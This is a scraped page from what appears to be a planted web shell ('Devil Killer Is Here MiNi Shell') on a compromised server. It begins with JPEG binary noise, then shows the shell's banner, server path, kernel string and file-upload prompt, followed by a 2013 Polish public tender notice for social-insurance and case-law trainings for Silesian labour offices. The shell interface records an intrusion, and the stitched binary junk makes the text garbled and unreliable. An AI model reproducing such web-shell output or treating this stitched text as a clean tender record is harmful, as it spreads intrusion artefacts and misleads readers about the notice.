JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130822/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130822/339470-N-2013.html

<p class="kh_header"><b>Katowice: Przygotowanie i przeprowadzenie jednodniowych szkoleń zamkniętych nt.: 
System ubezpieczeń społecznych w powiązaniu z ustaleniem świadczeń na podstawie ustawy o promocji zatrudnienia i instytucjach rynku pracy 
oraz Orzecznictwo wojewódzkich sądów administracyjnych w świetle stosowania ustawy z 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy 
dla grupy będącej pracownikami Powiatowych Urzędów Pracy oraz Wydziału Polityki Społecznej Śląskiego Urzędu Wojewódzkiego w Katowicach.</b><br>
<b>Numer ogłoszenia: 339470 - 2013; data zamieszczenia: 22.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Śląski Urząd Wojewódzki w Katowicach , ul. Jagiellońska 25, 40-032 Katowice, woj. śląskie, tel. 032 2077777, faks 032 2077395.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.uw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i przeprowadzenie jednodniowych szkoleń zamkniętych nt.: 
System ubezpieczeń społecznych w powiązaniu z ustaleniem świadczeń na podstawie ustawy o promocji zatrudnienia i instytucjach rynku pracy 
oraz Orzecznictwo wojewódzkich sądów administracyjnych w świetle stosowania ustawy z 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy 
dla grupy będącej pracownikami Powiatowych Urzędów Pracy oraz Wydziału Polityki Społecznej Śląskiego Urzędu Wojewódzkiego w Katowicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1:
Przedmiotem zamówienia jest przygotowanie i przeprowadzenie jednodniowego zamkniętego szkolenia pn. System ubezpieczeń społecznych w powiązaniu z ustaleniem świadczeń na podstawie ustawy o promocji zatrudnienia i instytucjach rynku pracy dla grupy nieprzekraczającej 45 osób, będących przedstawicielami Powiatowych Urzędów Pracy oraz pracownikami Wydziału Polityki Społecznej Śląskiego Urzędu Wojewódzkiego w Katowicach oraz zapewnienie poczęstunku podczas szkolenia. 
Zadanie 2:
Przedmiotem zamówienia jest przygotowanie i przeprowadzenie jednodniowego szkolenia pn.Orzecznictwo wojewódzkich sądów administracyjnych w świetle stosowania ustawy z 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy dla grupy nieprzekraczającej 45 osób, będących przedstawicielami Powiatowych Urzędów Pracy oraz pracownikami Wydziału Polityki Społecznej Śląskiego Urzędu Wojewódzkiego w Katowicach oraz zapewnienie poczęstunku podczas szkolenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 55.52.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży oświadczenie z art. 22 ust.1 ustawy Pzp  w tym zakresie -zgodnie z załącznikiem nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży oświadczenie z art. 22 ust.1 ustawy Pzp oraz wykaże, że:
 - należycie wykonał w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 usługi porównywalne z przedmiotem zamówienia - z zastrzeżeniem, że przez usługę porównywalną z przedmiotem zamówienia zamawiający rozumie przeprowadzenie co najmniej 3 szkoleń dla grupy liczącej minimum 15 osób każde -dotyczy zadania 1 i zadania 2.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży oświadczenie z art. 22 ust.1 ustawy Pzp. w tym zakresie -zgodnie z załącznikiem nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży oświadczenie z art. 22 ust.1 ustawy Pzp oraz wykaże, że:
w przypadku ZADANIA 1:
będzie dysponował co najmniej jednym trenerem do prowadzenia szkolenia pn. System ubezpieczeń społecznych w powiązaniu z ustaleniem świadczeń na podstawie ustawy o promocji zatrudnienia i instytucjach rynku pracy, który będzie spełniał wszystkie poniższe wymagania:
- posiadał wykształcenie wyższe,
- przeprowadził w okresie ostatnich trzech lat co najmniej 3 szkolenia dla publicznych służb zatrudnienia z obszaru dotyczącego systemu ubezpieczeń społecznych w powiązaniu z ustaleniem świadczeń na podstawie ustawy o promocji zatrudnienia i instytucjach rynku pracy, dla grupy liczącej minimum 15 osób każde.
w przypadku ZADANIA 2:
będzie dysponował co najmniej jednym trenerem do prowadzenia szkolenia pn. Orzecznictwo wojewódzkich sądów administracyjnych w świetle stosowania ustawy z 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy, który będzie spełniał wszystkie poniższe wymagania: 
- posiadał wykształcenie wyższe na kierunku prawo,
- przeprowadził w okresie ostatnich trzech lat, co najmniej 3 szkolenia dla publicznych służb zatrudnienia z obszaru dotyczącego orzecznictwa wojewódzkich sadów administracyjnych w świetle stosowania ustawy z 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy, dla grupy liczącej minimum 15 osób każde.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży oświadczenie z art. 22 ust.1 ustawy Pzp w tym zakresie -zgodnie z załącznikiem nr 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Podpisany przez Wykonawcę opis przedmiotu zamówienia - załącznik nr 1 i/lub 2</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)zmian regulacji prawnych obowiązujących w dniu podpisania umowy,
2)zakres rzeczowy umowy ulegnie zmniejszeniu z przyczyn niezależnych od Zamawiającego lub innych uzasadnionych okoliczności,
3)zmiany osoby wykonującej przedmiot zamówienia  z przyczyn niezależnych od Wykonawcy lub innych uzasadnionych okoliczności,
4)w sytuacji wyrażenia przez Zamawiającego zgody na przedłużenie terminu wykonania przedmiotu zamówienia na skutek zaistnienia okoliczności niezawinionych przez Wykonawcę.
5)dopuszcza się możliwość zmiany miejsca wykonywania przedmiotu zamówienia w sytuacji wystąpienia siły wyższej, która uniemożliwi wykonanie go we wskazanym
w ofercie miejscu. Za siłę wyższą uważa się zdarzenia zewnętrzne, których skutków nie da się przewidzieć ani im zapobiec. W szczególności za siłę wyższą będzie się uważało działania sił przyrody takie jak: huragan, trzęsienie ziemi, powódź, lub zamieszki, wojnę,
6)wynikną rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.katowice.uw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Śląski Urząd Wojewódzki w Katowicach, ul. Jagiellońska 25 40-032 Katowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.08.2013 godzina 10:00, miejsce: Śląski Urząd Wojewódzki w Katowicach, ul. Jagiellońska 25, Kancelaria Śląskiego Urzędu Wojewódzkiego - Biuro Obsługi Klienta, pokój 119.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przeprowadzenie jednodniowego zamkniętego szkolenia pn. System ubezpieczeń społecznych w powiązaniu z ustaleniem świadczeń na podstawie ustawy o promocji zatrudnienia i instytucjach rynku pracy dla grupy nieprzekraczającej 45 osób, będących przedstawicielami Powiatowych Urzędów Pracy oraz pracownikami Wydziału Polityki Społecznej Śląskiego Urzędu Wojewódzkiego w Katowicach oraz zapewnienie poczęstunku podczas szkolenia..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie będzie realizowane w jednej grupie. Ostateczna liczba uczestników określona zostanie na 4 dni robocze przed szkoleniem, jednak nie przekroczy ona 45 osób i nie będzie mniejsza niż 40 osób.
Miejsce wykonania zamówienia: sala w gmachu Śląskiego Urzędu Wojewódzkiego przy ul. Jagiellońskiej 25, 40-032 Katowice.
Harmonogram szkolenia powinien:
obejmować nie mniej niż 8 godzin zegarowych-8 x 60 minut, w tym dwie krótkie przerwy obejmujące po 10 minut oraz jedna dłuższa przerwa obejmująca do 30 minut,przy czym czas na przerwy ustalany będzie elastycznie z uczestnikami szkolenia w trakcie jego realizacji. 
być zrealizowany w godz. od 8:30 do 16:30.
Zakres zamówienia:
1.Realizacja programu szkolenia obejmującego co najmniej zagadnienia wskazane pod zakresem zamówienia, poprzez przeprowadzenie podczas szkolenia wykładów i ćwiczeń. Ćwiczenia mogą przyjąć formę studium przypadku, praktycznych zadań do realizacji, umożliwiających wymianę poglądów, dyskusji w spornych kwestiach oraz pracy w grupach;
2.Odpowiadanie na pytania uczestników szkolenia podczas jego realizacji;
3.Konsultacje indywidualne, możliwość kontaktu z osobą prowadzącą również po zajęciach w formie email przez miesiąc po zakończeniu szkolenia;
4.Przygotowanie prezentacji multimedialnej do szkolenia;
5.Przygotowanie, powielenie i przekazanie na własność materiałów szkoleniowych dla uczestników:
skrypt z prezentacją wraz z aktualnymi aktami prawnymi, jeśli ich posiadanie wymagane jest ze względu na treść szkolenia w formie papierowej jak również w formie elektronicznej;
materiały biurowe dla uczestników szkolenia: teczka, notes, długopis;
6.Przekazanie uczestnikom listy obecności i nadzorowanie jej podpisania;
7.Powielenie i rozdanie ankiet ewaluacyjnych AIOS  arkuszy indywidualnej oceny szkolenia, przekazanych wykonawcy przez Zamawiającego do 4 dni roboczych przed szkoleniem poprzez pocztę elektroniczną; 
8.Wydanie na zakończenie szkolenia zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia dla każdego uczestnika; 
9.Opracowanie oraz przeprowadzenie wśród uczestników badania efektywności szkolenia za pomocą pre i posttestów zawierających minimum 15 pytań. Pytania zawarte w testach powinny być ściśle związane z tematyką szkolenia.
10.Przekazanie Zamawiającemu w ciągu 5 dni roboczych po przeprowadzeniu szkolenia:
tabeli wyników pre i posttestów. Analiza powinna zawierać zbiorcze zestawienie ocen w szczególności:
poziom wiedzy uczestników z zakresu tematu szkolenia przed jego realizacją,
poziom wiedzy uczestników z zakresu tematu szkolenia po jego realizacji.

Wzór dokumentu stanowiącego arkusz analizy wyników przekazany zostanie Zamawiającemu w ciągu 3 dni roboczych od momentu podpisania umowy, w celu ustalenia jego ostatecznej wersji;
kopii listy obecności uczestników szkolenia, potwierdzonej za zgodność z oryginałem;
kopii zaświadczeń, potwierdzonych za zgodność z oryginałem;
rejestru zaświadczeń potwierdzających ukończenie szkolenia;
arkuszy indywidualnej oceny szkolenia lub ocenę zbiorczą sporządzoną na podstawie tych arkuszy;
raportu ewaluacyjnego zawierającego pełną analizę ocen dokonanych przez uczestników,raport powinien być dokonany na podstawie ankiet ewaluacyjnych AIOS oraz powinien obejmować:
stopień zrealizowania celu i założeń szkolenia,
stopień wypełnienia warunków umowy,
sposób organizacji szkolenia,
współpracę pomiędzy wykonawcą a Zamawiającym. 
Jednocześnie raport powinien zawierać spostrzeżenia osoby prowadzącej szkolenie dotyczące:
zakresu z jakiego uczestnicy zadawali pytania, 
dyskusji jakie wywiązały się podczas szkolenia,
ewentualnych przyszłych potrzeb szkoleniowych związanych z tematem szkolenia, zgłaszanych podczas realizacji szkolenia;
11.Zapewnienie poczęstunku:
        1 całodziennego serwisu kawowego serwowanego w formie bufetu szwedzkiego, w ilości adekwatnej do ilości uczestników szkolenia, obejmującego:
kawę,herbatę, wodę mineralną gazowaną i niegazowaną,dwa rodzaje soków owocowych,trzy rodzaje kruchych ciasteczek lub wypieków,cukier,cytrynę, śmietankę,mleczko do kawy.
            1 posiłku typu lunch serwowanego w formie bufetu szwedzkiego, w ilości adekwatnej do ilości uczestników szkolenia, obejmującego:
dwa dania ciepłe,trzy rodzaje sałatek,zimną płytę z wędlinami i serami,pieczywo,
wodę mineralną gazowaną i niegazowaną,dwa rodzaje soków owocowych,dwa rodzaje ciast. 
Wykonawca zamówienia zobowiązany jest do przekazania Zamawiającemu w terminie dwóch dni roboczych od daty podpisania umowy dotyczącej realizacji szkolenia, 2 propozycji menu dla każdego lunchu oraz przerw kawowych.
Ostateczną liczbę posiłków, godziny ich podawania oraz menu Zamawiający określi na 4 dni robocze przed realizacją zamówienia. 
12.Informowanie Zamawiającego o wszystkich utrudnieniach przy realizacji zamówienia. 
II. Program seminarium szkoleniowego powinien obejmować następujące zagadnienia: 
1.Zasady podlegania ubezpieczeniom społecznym, 
2.Obowiązkowe a dobrowolne ubezpieczenie społeczne ,uprawnienia, skutki,
3.Zasady ustalania składek na ubezpieczenie społeczne oraz podstaw ich wymiaru,  
4.Zasady, tryb i terminy zgłoszeń do ubezpieczeń społecznych, w tym. m.in. obowiązki pracownika, osoby świadczącej pracę a pracodawcy w zakresie ustalania i opłacania składek na ubezpieczenie społeczne,
5.Zasady prowadzenia ewidencji ubezpieczeniowych i płatników składek, w tym zasady prowadzenia  kont ubezpieczonych i płatników składek, 
6.Zasady, terminy  rozliczania składek na ubezpieczenie społeczne w przypadku zasiłków z ubezpieczenia chorobowego, 
7.Zasady, tryb i terminy opłacania składek, 
8.Zbieg tytułów objęcia ubezpieczeniem społecznym,
9.Ustalanie podstawy wymiaru składek na ubezpieczenie społeczne i Fundusz Pracy wymaganej do   ustalenia uprawnień z tytułu prawa do zasiłku  dla bezrobotnych  w przypadku uprzedniego świadczenia pracy w ramach:
cywilnoprawnych form świadczenia pracy,umowa o pracę w pełnym i niepełnym 
   wymiarze czasu pracy, umowa zlecenie, o dzieło i inne;
prowadzonej działalności gospodarczej,
innych form świadczenia pracy np. wolne zawody,
10.Zwolnienia z obowiązku opłacania składek na ubezpieczenie społeczne, 
11.Ustalanie podstawy wymiaru zasiłku chorobowego, świadczenia rehabilitacyjnego, opiekuńczego i macierzyńskiego,
12.Zwłoka w opłacaniu obowiązkowych składek na ubezpieczenie społeczne a zaliczenie danego okresu  do uprawnień  emerytalno rentowych,
13.Rozliczanie składek na ubezpieczenie zdrowotne,
14.Ochrona danych osobowych, będących w posiadaniu  ZUS a ustalanie w postępowaniu administracyjnym prawa do  świadczeń, podstawy prawne wniosku dla celu skutecznego uzyskania informacji w zakresie podlegania ubezpieczeniu i wysokości podstawy składek itd..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 55.52.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> przygotowanie i przeprowadzenie jednodniowego szkolenia pn. Orzecznictwo wojewódzkich sądów administracyjnych w świetle stosowania ustawy z 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy dla grupy nieprzekraczającej 45 osób, będących przedstawicielami Powiatowych Urzędów Pracy oraz pracownikami Wydziału Polityki Społecznej Śląskiego Urzędu Wojewódzkiego w Katowicach oraz zapewnienie poczęstunku podczas szkolenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie będzie realizowane w jednej grupie. Ostateczna liczba uczestników określona zostanie na 4 dni robocze przed szkoleniem, jednak nie przekroczy ona 45 osób i nie będzie mniejsza niż 40 osób.
Miejsce wykonania zamówienia: sala w gmachu Śląskiego Urzędu Wojewódzkiego przy ul. Jagiellońskiej 25, 40-032 Katowice.
I. Zakres zamówienia:
1.	Realizacja programu szkolenia obejmującego co najmniej zagadnienia wskazane pod zakresem zamówienia, poprzez przeprowadzenie podczas szkolenia wykładów i ćwiczeń. Ćwiczenia mogą przyjąć formę studium przypadku, praktycznych zadań do realizacji, umożliwiających wymianę poglądów, dyskusji w spornych kwestiach oraz pracy w grupach;
2.	Odpowiadanie na pytania uczestników szkolenia podczas jego realizacji;
3.	Konsultacje indywidualne, możliwość kontaktu z osobą prowadzącą również po zajęciach w formie email przez miesiąc po zakończeniu szkolenia;
4.	Przygotowanie prezentacji multimedialnej do szkolenia;
5.	Przygotowanie, powielenie i przekazanie na własność materiałów szkoleniowych dla uczestników:
